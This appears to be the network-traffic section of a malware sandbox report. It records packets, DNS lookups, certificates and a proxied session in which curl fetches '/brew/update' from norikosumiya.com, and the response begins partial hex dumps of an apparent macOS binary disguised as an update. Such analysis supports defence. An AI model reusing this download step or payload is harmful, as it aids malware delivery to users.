                                                                      Jan 19, 2025 20:31:52.704174042 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704174042 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704221010 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704370022 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704370022 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704513073 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704514027 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704514027 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704662085 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704782009 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.705641985 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.708168983 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.708479881 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.708790064 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.709112883 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.710541010 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.710648060 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:32:15.213443041 CET4934580192.168.11.1223.55.204.208
                                                                      Jan 19, 2025 20:32:15.363863945 CET804934523.55.204.208192.168.11.12
                                                                      Jan 19, 2025 20:32:15.657048941 CET804934523.55.204.208192.168.11.12
                                                                      Jan 19, 2025 20:32:15.659449100 CET4934580192.168.11.1223.55.204.208
                                                                      Jan 19, 2025 20:32:25.009325027 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.009438038 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.010039091 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.011159897 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.011214018 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.273164034 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.275151014 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.275219917 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.413177967 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.413407087 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.413875103 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.414156914 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.414433956 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.468009949 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.468051910 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.468589067 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.469393969 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.469407082 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.705360889 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.706507921 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.706674099 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.714867115 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.714993954 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.715205908 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.715823889 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.715823889 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:26.753449917 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:26.753521919 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:26.754228115 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:26.756608009 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:26.756644964 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:27.004534006 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:27.005880117 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:27.005959034 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:27.011997938 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:27.012229919 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:27.012748003 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:27.012864113 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:27.013396025 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.008294106 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.008394003 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.009052992 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.010006905 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.010059118 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.254182100 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.256105900 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.256105900 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.262253046 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.262480021 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.262990952 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.263073921 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.263897896 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.274785995 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.274898052 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.275623083 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.276278973 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.276364088 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.517435074 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.519543886 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.519543886 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.525424957 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.525535107 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.525687933 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.526192904 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.526376009 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.543122053 CET49398443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.543165922 CET44349398151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.543898106 CET49398443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.544661999 CET49398443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.544697046 CET44349398151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.789264917 CET44349398151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.791251898 CET49398443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.791251898 CET49398443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.799494982 CET49398443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.799741983 CET44349398151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.800203085 CET44349398151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.800621986 CET49398443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.800677061 CET49398443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.811532021 CET49399443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.811645985 CET44349399151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.812309027 CET49399443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.813052893 CET49399443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.813141108 CET44349399151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:45.062458038 CET44349399151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:45.064404964 CET49399443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:45.064487934 CET49399443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:45.071005106 CET49399443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:45.071250916 CET44349399151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:45.071717978 CET44349399151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:45.071816921 CET49399443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:45.072343111 CET49399443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:33:28.982016087 CET49400443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:28.982130051 CET44349400151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:28.982774019 CET49400443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:28.983536959 CET49400443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:28.983619928 CET44349400151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.213962078 CET44349400151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.216068029 CET49400443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.216377020 CET49400443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.222348928 CET49400443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.222476959 CET44349400151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.222696066 CET44349400151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.223253965 CET49400443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.223366022 CET49400443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.244096994 CET49401443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.244151115 CET44349401151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.244879007 CET49401443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.245517969 CET49401443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.245558977 CET44349401151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.475259066 CET44349401151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.477319956 CET49401443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.477319956 CET49401443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.483697891 CET49401443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.483809948 CET44349401151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.483962059 CET44349401151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.484563112 CET49401443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.484563112 CET49401443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.499954939 CET49402443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.499998093 CET44349402151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.500719070 CET49402443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.501461029 CET49402443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.501493931 CET44349402151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.727523088 CET44349402151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.729396105 CET49402443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.729417086 CET49402443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.739401102 CET49402443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.739522934 CET44349402151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.739706993 CET44349402151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.740216017 CET49402443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.740269899 CET49402443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.752592087 CET49403443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.752645016 CET44349403151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.753401995 CET49403443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.754043102 CET49403443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.754065037 CET44349403151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.987274885 CET44349403151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.988157988 CET49403443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.988158941 CET49403443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.996423006 CET49403443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.996666908 CET44349403151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.997160912 CET44349403151.101.67.6192.168.11.12
                                                                      Jan 19, 2025 20:33:29.997270107 CET49403443192.168.11.12151.101.67.6
                                                                      Jan 19, 2025 20:33:29.997980118 CET49403443192.168.11.12151.101.67.6
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 19, 2025 20:31:50.537225962 CET5435453192.168.11.121.1.1.1
                                                                      Jan 19, 2025 20:31:50.668982983 CET53543541.1.1.1192.168.11.12
                                                                      Jan 19, 2025 20:32:10.322436094 CET53592611.1.1.1192.168.11.12
                                                                      Jan 19, 2025 20:33:28.842664957 CET5551253192.168.11.121.1.1.1
                                                                      Jan 19, 2025 20:33:28.979610920 CET53555121.1.1.1192.168.11.12

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jan 19, 2025 20:31:50.537225962 CET192.168.11.121.1.1.10xcf7cStandard query (0)norikosumiya.comA (IP address)IN (0x0001)false
                                                                      Jan 19, 2025 20:33:28.842664957 CET192.168.11.121.1.1.10xc4deStandard query (0)h3.apis.apple.map.fastly.netA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jan 19, 2025 20:31:46.820705891 CET1.1.1.1192.168.11.120x91f7No error (0)gateway.fe2.apple-dns.net17.248.228.69A (IP address)IN (0x0001)false
                                                                      Jan 19, 2025 20:31:46.820705891 CET1.1.1.1192.168.11.120x91f7No error (0)gateway.fe2.apple-dns.net17.248.228.71A (IP address)IN (0x0001)false
                                                                      Jan 19, 2025 20:31:46.820705891 CET1.1.1.1192.168.11.120x91f7No error (0)gateway.fe2.apple-dns.net17.248.228.70A (IP address)IN (0x0001)false
                                                                      Jan 19, 2025 20:31:46.820705891 CET1.1.1.1192.168.11.120x91f7No error (0)gateway.fe2.apple-dns.net17.248.228.66A (IP address)IN (0x0001)false
                                                                      Jan 19, 2025 20:31:50.668982983 CET1.1.1.1192.168.11.120xcf7cNo error (0)norikosumiya.com81.19.135.228A (IP address)IN (0x0001)false
                                                                      Jan 19, 2025 20:33:28.979610920 CET1.1.1.1192.168.11.120xc4deNo error (0)h3.apis.apple.map.fastly.net151.101.3.6A (IP address)IN (0x0001)false
                                                                      Jan 19, 2025 20:33:28.979610920 CET1.1.1.1192.168.11.120xc4deNo error (0)h3.apis.apple.map.fastly.net151.101.67.6A (IP address)IN (0x0001)false
                                                                      Jan 19, 2025 20:33:28.979610920 CET1.1.1.1192.168.11.120xc4deNo error (0)h3.apis.apple.map.fastly.net151.101.195.6A (IP address)IN (0x0001)false
                                                                      Jan 19, 2025 20:33:28.979610920 CET1.1.1.1192.168.11.120xc4deNo error (0)h3.apis.apple.map.fastly.net151.101.131.6A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • norikosumiya.com

                                                                      HTTPS Connections

                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                      Jan 19, 2025 20:31:46.745444059 CET151.101.3.6443192.168.11.1249349CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 13 17:31:50 CET 2024 Wed Apr 29 14:54:50 CEST 2020Wed Mar 12 20:42:08 CET 2025 Thu Apr 11 01:59:59 CEST 2030
                                                                      CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 29 14:54:50 CEST 2020Thu Apr 11 01:59:59 CEST 2030
                                                                      Jan 19, 2025 20:31:47.051085949 CET17.248.228.69443192.168.11.1249350CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=USCN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US C=US, O=Apple Inc., OU=Apple Certification Authority, CN=Apple Root CA - G3Mon Oct 28 07:43:49 CET 2024 Wed Dec 12 13:00:00 CET 2018 Mon Dec 18 22:12:39 CET 2023Tue Nov 18 21:36:07 CET 2025 Wed Dec 11 13:00:00 CET 2030 Wed Dec 05 01:00:00 CET 2029771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,05c118da645babe52f060d0754256a73c
                                                                      CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=USCN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=USWed Dec 12 13:00:00 CET 2018Wed Dec 11 13:00:00 CET 2030
                                                                      CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=USC=US, O=Apple Inc., OU=Apple Certification Authority, CN=Apple Root CA - G3Mon Dec 18 22:12:39 CET 2023Wed Dec 05 01:00:00 CET 2029

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      0192.168.11.124935681.19.135.228443
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-19 19:31:51 UTC91OUTGET /brew/update HTTP/1.1
                                                                      Host: norikosumiya.com
                                                                      User-Agent: curl/7.54.0
                                                                      Accept: */*
                                                                      2025-01-19 19:31:51 UTC291INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 19 Jan 2025 19:31:53 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 234656
                                                                      Last-Modified: Sun, 19 Jan 2025 19:20:35 GMT
                                                                      Connection: close
                                                                      ETag: "678d5083-394a0"
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Accept-Ranges: bytes
                                                                      2025-01-19 19:31:51 UTC16093INData Raw: ca fe ba be 00 00 00 02 01 00 00 07 00 00 00 03 00 00 40 00 00 01 55 70 00 00 00 0e 01 00 00 0c 00 00 00 00 00 01 c0 00 00 01 d4 a0 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: @Up
                                                                      2025-01-19 19:31:51 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      2025-01-19 19:31:52 UTC16384INData Raw: 33 31 34 33 36 37 35 31 33 39 33 66 34 34 35 31 34 63 37 39 34 35 36 37 32 35 34 32 36 63 32 33 32 35 34 32 36 32 34 38 35 36 36 36 36 32 34 65 36 64 34 32 36 63 35 35 34 63 35 30 34 39 34 34 33 39 33 66 34 39 36 37 32 35 34 31 33 63 37 38 33 31 34 33 34 38 36 38 34 62 35 34 36 66 37 34 34 62 33 66 34 39 36 63 36 64 34 62 33 32 34 30 36 64 34 32 36 32 36 33 33 33 34 32 37 33 36 37 33 39 34 62 33 32 36 37 34 63 37 31 33 32 32 64 34 63 36 34 36 32 37 31 35 36 36 36 36 32 34 32 34 63 36 36 34 36 36 66 33 31 33 66 32 35 35 31 37 34 34 64 35 39 34 64 33 30 37 31 32 35 35 31 37 34 34 64 33 32 32 36 36 64 33 66 37 34 37 31 33 31 34 33 33 36 36 37 35 33 33 66 33 63 36 63 34 63 35 34 37 38 37 34 34 62 35 34 36 66 37 34 35 37 36 36 36 32 36 37 32 35 34 31 34 39 36
                                                                      Data Ascii: 31436751393f44514c79456725426c23254262485666624e6d426c554c504944393f496725413c78314348684b546f744b3f496c6d4b32406d42626333427367394b32674c71322d4c646271566662424c66466f313f2551744d594d30712551744d32266d3f747131433667533f3c6c4c5478744b546f74576662672541496
                                                                      2025-01-19 19:31:52 UTC16384INData Raw: 33 31 34 33 36 64 37 30 33 39 34 33 33 63 37 30 35 36 35 30 33 32 35 30 34 63 34 32 36 63 32 36 33 39 34 32 33 63 32 36 34 63 36 36 33 36 36 66 35 36 37 39 34 39 34 64 33 31 34 32 33 36 34 64 33 31 34 33 36 32 34 65 35 37 34 32 36 64 36 66 35 37 34 32 35 31 34 64 33 30 34 62 35 39 34 64 33 39 34 33 37 34 33 65 33 39 37 39 34 35 32 36 33 31 34 32 33 63 36 65 33 31 36 36 34 30 35 30 33 39 34 32 33 34 33 65 35 37 34 32 36 64 34 30 33 39 34 32 37 33 37 38 35 36 34 33 33 34 32 36 33 31 36 36 36 65 37 39 33 31 36 36 36 64 32 36 33 39 37 39 34 34 34 64 33 30 34 62 35 39 34 64 33 31 36 36 36 33 35 35 33 31 34 32 36 65 32 31 35 36 37 39 33 34 34 30 33 31 37 39 34 36 32 33 34 63 34 33 36 33 34 30 35 37 34 32 34 39 36 33 34 63 34 32 36 65 37 38 33 31 36 36 37 33 36
                                                                      Data Ascii: 31436d7039433c70565032504c426c2639423c264c66366f5679494d3142364d3143624e57426d6f5742514d304b594d3943743e3979452631423c6e316640503942343e57426d40394273785643342631666e7931666d263979444d304b594d3166635531426e2156793440317946234c436340574249634c426e783166736
                                                                      2025-01-19 19:31:52 UTC16384INData Raw: 34 63 36 36 33 31 34 30 34 63 34 32 33 33 35 31 37 34 34 64 35 39 34 64 33 30 36 37 34 36 34 30 35 36 35 30 37 34 36 65 35 37 35 30 36 66 35 35 35 34 33 66 33 32 34 65 34 63 34 32 36 63 32 36 35 36 33 66 33 63 34 30 34 63 36 36 34 38 35 31 33 33 36 34 36 32 34 65 35 37 34 32 34 35 37 31 36 64 34 62 37 37 34 64 34 62 35 30 34 39 36 63 36 64 34 62 33 32 34 65 35 36 33 66 34 39 32 64 36 64 36 36 34 35 37 31 33 31 37 33 34 35 36 63 34 63 35 30 33 63 36 63 35 37 37 39 36 32 36 66 32 35 34 31 33 63 35 35 32 35 34 32 36 64 36 63 36 64 34 31 33 32 36 34 33 31 34 62 36 65 33 34 35 37 36 36 36 32 37 31 34 63 37 39 37 33 36 33 33 31 35 33 34 65 35 31 36 64 36 34 37 34 34 30 36 64 34 32 36 32 36 33 33 39 34 33 33 36 36 66 36 38 35 34 34 30 36 66 33 31 34 33 34 36 36
                                                                      Data Ascii: 4c6631404c423351744d594d306746405650746e57506f55543f324e4c426c26563f3c404c6648513364624e574245716d4b774d4b50496c6d4b324e563f492d6d6645713173456c4c503c6c5779626f25413c5525426d6c6d413264314b6e34576662714c79736331534e516d6474406d4262633943366f6854406f3143466
                                                                      2025-01-19 19:31:52 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      2025-01-19 19:31:52 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii:
